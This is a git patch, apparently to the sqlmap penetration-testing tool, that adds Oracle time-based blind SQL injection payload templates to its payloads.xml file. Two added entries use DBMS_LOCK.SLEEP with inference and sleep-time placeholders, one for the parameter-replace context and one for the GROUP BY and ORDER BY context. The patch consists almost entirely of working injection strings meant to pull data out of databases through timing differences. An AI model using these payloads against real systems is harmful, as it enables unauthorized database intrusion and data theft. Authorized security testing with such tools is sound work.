From 9b0662d1a91cbc7327b20241b7b70f8699229acb Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 9 Apr 2014 12:14:16 +0000 Subject: [PATCH] added new Oracle time-based payloads --- xml/payloads.xml | 42 ++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 40 insertions(+), 2 deletions(-) diff --git a/xml/payloads.xml b/xml/payloads.xml index 89036aa0b..2095bc249 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -3325,7 +3325,26 @@ Formats: - Oracle time-based blind - Parameter replace + Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP) + 5 + 3 + 0 + 1,3 + 3 + (BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END) + + (BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE) 5 3 1 @@ -3605,7 +3624,26 @@ Formats: - Oracle time-based blind - GROUP BY and ORDER BY clauses + Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP) + 5 + 3 + 0 + 2,3 + 1 + ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE 1/(SELECT 0 FROM DUAL); END IF; END) + + ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE 1/(SELECT 0 FROM DUAL); END IF; END) + + + + +
+ Oracle +
+
+ + + Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE) 5 3 1